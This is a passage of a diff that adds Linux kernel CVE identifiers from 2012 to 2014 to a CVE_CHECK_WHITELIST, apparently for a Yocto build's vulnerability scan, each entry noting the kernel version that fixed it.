+CVE_CHECK_WHITELIST += "CVE-2012-6547"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6548"
+
+# fixed-version: Fixed after version 3.6rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6549"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6638"
+
+# fixed-version: Fixed after version 3.6rc2
+CVE_CHECK_WHITELIST += "CVE-2012-6647"
+
+# fixed-version: Fixed after version 3.6
+CVE_CHECK_WHITELIST += "CVE-2012-6657"
+
+# fixed-version: Fixed after version 3.6rc5
+CVE_CHECK_WHITELIST += "CVE-2012-6689"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6701"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6703"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6704"
+
+# fixed-version: Fixed after version 3.4rc1
+CVE_CHECK_WHITELIST += "CVE-2012-6712"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-0160"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0190"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0216"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0217"
+
+# fixed-version: Fixed after version 3.8
+CVE_CHECK_WHITELIST += "CVE-2013-0228"
+
+# fixed-version: Fixed after version 3.8rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0231"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-0268"
+
+# fixed-version: Fixed after version 3.8
+CVE_CHECK_WHITELIST += "CVE-2013-0290"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2013-0309"
+
+# fixed-version: Fixed after version 3.5
+CVE_CHECK_WHITELIST += "CVE-2013-0310"
+
+# fixed-version: Fixed after version 3.7rc8
+CVE_CHECK_WHITELIST += "CVE-2013-0311"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0313"
+
+# fixed-version: Fixed after version 3.11rc7
+CVE_CHECK_WHITELIST += "CVE-2013-0343"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-0349"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-0871"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-0913"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-0914"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1059"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1763"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1767"
+
+# fixed-version: Fixed after version 3.5rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1772"
+
+# fixed-version: Fixed after version 3.3rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1773"
+
+# fixed-version: Fixed after version 3.8rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1774"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1792"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1796"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1797"
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-1798"
+
+# fixed-version: Fixed after version 3.8rc6
+CVE_CHECK_WHITELIST += "CVE-2013-1819"
+
+# fixed-version: Fixed after version 3.6rc7
+CVE_CHECK_WHITELIST += "CVE-2013-1826"
+
+# fixed-version: Fixed after version 3.6rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1827"
+
+# fixed-version: Fixed after version 3.9rc2
+CVE_CHECK_WHITELIST += "CVE-2013-1828"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1848"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1858"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1860"
+
+# fixed-version: Fixed after version 3.7rc3
+CVE_CHECK_WHITELIST += "CVE-2013-1928"
+
+# fixed-version: Fixed after version 3.9rc6
+CVE_CHECK_WHITELIST += "CVE-2013-1929"
+
+# Skipping CVE-2013-1935, no affected_versions
+
+# fixed-version: Fixed after version 3.0rc1
+CVE_CHECK_WHITELIST += "CVE-2013-1943"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1956"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1957"
+
+# fixed-version: Fixed after version 3.9rc5
+CVE_CHECK_WHITELIST += "CVE-2013-1958"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-1959"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-1979"
+
+# fixed-version: Fixed after version 3.8rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2015"
+
+# fixed-version: Fixed after version 2.6.34
+CVE_CHECK_WHITELIST += "CVE-2013-2017"
+
+# fixed-version: Fixed after version 3.8rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2058"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2094"
+
+# fixed-version: Fixed after version 2.6.34rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2128"
+
+# fixed-version: Fixed after version 3.11rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2140"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2141"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2146"
+
+# fixed-version: Fixed after version 3.12rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2147"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2148"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2164"
+
+# Skipping CVE-2013-2188, no affected_versions
+
+# fixed-version: Fixed after version 3.9rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2206"
+
+# Skipping CVE-2013-2224, no affected_versions
+
+# fixed-version: Fixed after version 3.10
+CVE_CHECK_WHITELIST += "CVE-2013-2232"
+
+# fixed-version: Fixed after version 3.10
+CVE_CHECK_WHITELIST += "CVE-2013-2234"
+
+# fixed-version: Fixed after version 3.9rc6
+CVE_CHECK_WHITELIST += "CVE-2013-2237"
+
+# Skipping CVE-2013-2239, no affected_versions
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2546"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2547"
+
+# fixed-version: Fixed after version 3.9rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2548"
+
+# fixed-version: Fixed after version 3.9rc8
+CVE_CHECK_WHITELIST += "CVE-2013-2596"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2634"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2635"
+
+# fixed-version: Fixed after version 3.9rc3
+CVE_CHECK_WHITELIST += "CVE-2013-2636"
+
+# fixed-version: Fixed after version 3.10rc4
+CVE_CHECK_WHITELIST += "CVE-2013-2850"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2851"
+
+# fixed-version: Fixed after version 3.10rc6
+CVE_CHECK_WHITELIST += "CVE-2013-2852"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2888"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2889"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2890"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2891"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2892"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2893"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2894"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2895"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2896"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-2897"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2898"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2899"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2929"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-2930"
+
+# fixed-version: Fixed after version 3.9
+CVE_CHECK_WHITELIST += "CVE-2013-3076"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3222"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3223"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3224"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3225"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3226"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3227"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3228"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3229"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3230"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3231"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3232"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3233"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3234"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3235"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3236"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3237"
+
+# fixed-version: Fixed after version 3.9rc7
+CVE_CHECK_WHITELIST += "CVE-2013-3301"
+
+# fixed-version: Fixed after version 3.8rc3
+CVE_CHECK_WHITELIST += "CVE-2013-3302"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4125"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4127"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4129"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4162"
+
+# fixed-version: Fixed after version 3.11rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4163"
+
+# fixed-version: Fixed after version 3.11rc5
+CVE_CHECK_WHITELIST += "CVE-2013-4205"
+
+# fixed-version: Fixed after version 3.10rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4220"
+
+# fixed-version: Fixed after version 3.10rc5
+CVE_CHECK_WHITELIST += "CVE-2013-4247"
+
+# fixed-version: Fixed after version 3.11rc6
+CVE_CHECK_WHITELIST += "CVE-2013-4254"
+
+# fixed-version: Fixed after version 3.12rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4270"
+
+# fixed-version: Fixed after version 3.12rc6
+CVE_CHECK_WHITELIST += "CVE-2013-4299"
+
+# fixed-version: Fixed after version 3.11
+CVE_CHECK_WHITELIST += "CVE-2013-4300"
+
+# fixed-version: Fixed after version 4.5rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4312"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4343"
+
+# fixed-version: Fixed after version 3.13rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4345"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4348"
+
+# fixed-version: Fixed after version 3.12rc2
+CVE_CHECK_WHITELIST += "CVE-2013-4350"
+
+# fixed-version: Fixed after version 3.12rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4387"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-4470"
+
+# fixed-version: Fixed after version 3.10rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4483"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4511"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4512"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4513"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4514"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4515"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-4516"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4563"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2013-4579"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4587"
+
+# fixed-version: Fixed after version 2.6.33rc4
+CVE_CHECK_WHITELIST += "CVE-2013-4588"
+
+# fixed-version: Fixed after version 3.8rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4591"
+
+# fixed-version: Fixed after version 3.7rc1
+CVE_CHECK_WHITELIST += "CVE-2013-4592"
+
+# Skipping CVE-2013-4737, no affected_versions
+
+# Skipping CVE-2013-4738, no affected_versions
+
+# Skipping CVE-2013-4739, no affected_versions
+
+# fixed-version: Fixed after version 3.10rc5
+CVE_CHECK_WHITELIST += "CVE-2013-5634"
+
+# fixed-version: Fixed after version 3.6rc6
+CVE_CHECK_WHITELIST += "CVE-2013-6282"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6367"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6368"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6376"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6378"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6380"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6381"
+
+# fixed-version: Fixed after version 3.13rc4
+CVE_CHECK_WHITELIST += "CVE-2013-6382"
+
+# fixed-version: Fixed after version 3.12
+CVE_CHECK_WHITELIST += "CVE-2013-6383"
+
+# Skipping CVE-2013-6392, no affected_versions
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6431"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6432"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2013-6885"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7026"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7027"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7263"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7264"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7265"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7266"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7267"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7268"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7269"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7270"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7271"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7281"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7339"
+
+# fixed-version: Fixed after version 3.13rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7348"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2013-7421"
+
+# CVE-2013-7445 has no known resolution
+
+# fixed-version: Fixed after version 4.4rc4
+CVE_CHECK_WHITELIST += "CVE-2013-7446"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2013-7470"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-0038"
+
+# fixed-version: Fixed after version 3.14rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0049"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-0055"
+
+# fixed-version: Fixed after version 3.14rc4
+CVE_CHECK_WHITELIST += "CVE-2014-0069"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-0077"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-0100"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-0101"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-0102"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-0131"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-0155"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0181"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0196"
+
+# fixed-version: Fixed after version 2.6.33rc5
+CVE_CHECK_WHITELIST += "CVE-2014-0203"
+
+# fixed-version: Fixed after version 2.6.37rc1
+CVE_CHECK_WHITELIST += "CVE-2014-0205"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-0206"
+
+# Skipping CVE-2014-0972, no affected_versions
+
+# fixed-version: Fixed after version 3.13
+CVE_CHECK_WHITELIST += "CVE-2014-1438"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1444"
+
+# fixed-version: Fixed after version 3.12rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1445"
+
+# fixed-version: Fixed after version 3.13rc7
+CVE_CHECK_WHITELIST += "CVE-2014-1446"
+
+# fixed-version: Fixed after version 3.13rc8
+CVE_CHECK_WHITELIST += "CVE-2014-1690"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-1737"
+
+# fixed-version: Fixed after version 3.15rc5
+CVE_CHECK_WHITELIST += "CVE-2014-1738"
+
+# fixed-version: Fixed after version 3.15rc6
+CVE_CHECK_WHITELIST += "CVE-2014-1739"
+
+# fixed-version: Fixed after version 3.14rc2
+CVE_CHECK_WHITELIST += "CVE-2014-1874"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2038"
+
+# fixed-version: Fixed after version 3.14rc3
+CVE_CHECK_WHITELIST += "CVE-2014-2039"
+
+# fixed-version: Fixed after version 3.14rc7
+CVE_CHECK_WHITELIST += "CVE-2014-2309"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2523"
+
+# fixed-version: Fixed after version 3.14
+CVE_CHECK_WHITELIST += "CVE-2014-2568"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2580"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2672"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2673"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2678"
+
+# fixed-version: Fixed after version 3.14rc6
+CVE_CHECK_WHITELIST += "CVE-2014-2706"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-2739"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-2851"
+
+# fixed-version: Fixed after version 3.2rc7
+CVE_CHECK_WHITELIST += "CVE-2014-2889"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3122"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3144"
+
+# fixed-version: Fixed after version 3.15rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3145"
+
+# fixed-version: Fixed after version 3.15
+CVE_CHECK_WHITELIST += "CVE-2014-3153"
+
+# fixed-version: Fixed after version 3.17rc4
+CVE_CHECK_WHITELIST += "CVE-2014-3180"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3181"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3182"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3183"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3184"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3185"
+
+# fixed-version: Fixed after version 3.17rc3
+CVE_CHECK_WHITELIST += "CVE-2014-3186"
+
+# Skipping CVE-2014-3519, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc7
+CVE_CHECK_WHITELIST += "CVE-2014-3534"
+
+# fixed-version: Fixed after version 2.6.36rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3535"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3601"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3610"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3611"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-3631"
+
+# fixed-version: Fixed after version 3.12rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3645"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3646"
+
+# fixed-version: Fixed after version 3.18rc2
+CVE_CHECK_WHITELIST += "CVE-2014-3647"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3673"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3687"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3688"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3690"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-3917"
+
+# fixed-version: Fixed after version 3.15
+CVE_CHECK_WHITELIST += "CVE-2014-3940"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4014"
+
+# fixed-version: Fixed after version 3.14rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4027"
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4157"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4171"
+
+# Skipping CVE-2014-4322, no affected_versions
+
+# Skipping CVE-2014-4323, no affected_versions
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4508"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4608"
+
+# fixed-version: Fixed after version 3.16rc3
+CVE_CHECK_WHITELIST += "CVE-2014-4611"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4652"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4653"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4654"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4655"
+
+# fixed-version: Fixed after version 3.16rc2
+CVE_CHECK_WHITELIST += "CVE-2014-4656"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-4667"
+
+# fixed-version: Fixed after version 3.16rc4
+CVE_CHECK_WHITELIST += "CVE-2014-4699"
+
+# fixed-version: Fixed after version 3.16rc6
+CVE_CHECK_WHITELIST += "CVE-2014-4943"
+
+# fixed-version: Fixed after version 3.16rc7
+CVE_CHECK_WHITELIST += "CVE-2014-5045"
+
+# fixed-version: Fixed after version 3.16
+CVE_CHECK_WHITELIST += "CVE-2014-5077"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-5206"
+
+# fixed-version: Fixed after version 3.17rc1
+CVE_CHECK_WHITELIST += "CVE-2014-5207"
+
+# Skipping CVE-2014-5332, no affected_versions
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-5471"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-5472"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6410"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6416"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6417"
+
+# fixed-version: Fixed after version 3.17rc5
+CVE_CHECK_WHITELIST += "CVE-2014-6418"
+
+# fixed-version: Fixed after version 3.17rc2
+CVE_CHECK_WHITELIST += "CVE-2014-7145"
+
+# Skipping CVE-2014-7207, no affected_versions
+
+# fixed-version: Fixed after version 3.15rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7283"
+
+# fixed-version: Fixed after version 3.15rc7
+CVE_CHECK_WHITELIST += "CVE-2014-7284"
+
+# fixed-version: Fixed after version 3.16rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7822"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-7825"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-7826"
+
+# fixed-version: Fixed after version 3.18rc5
+CVE_CHECK_WHITELIST += "CVE-2014-7841"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7842"
+
+# fixed-version: Fixed after version 3.18rc5
+CVE_CHECK_WHITELIST += "CVE-2014-7843"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7970"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-7975"
+
+# fixed-version: Fixed after version 3.18rc3
+CVE_CHECK_WHITELIST += "CVE-2014-8086"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8133"
+
+# fixed-version: Fixed after version 3.19rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8134"
+
+# fixed-version: Fixed after version 4.0rc7
+CVE_CHECK_WHITELIST += "CVE-2014-8159"
+
+# fixed-version: Fixed after version 3.18rc1
+CVE_CHECK_WHITELIST += "CVE-2014-8160"
+
+# fixed-version: Fixed after version 3.12rc1
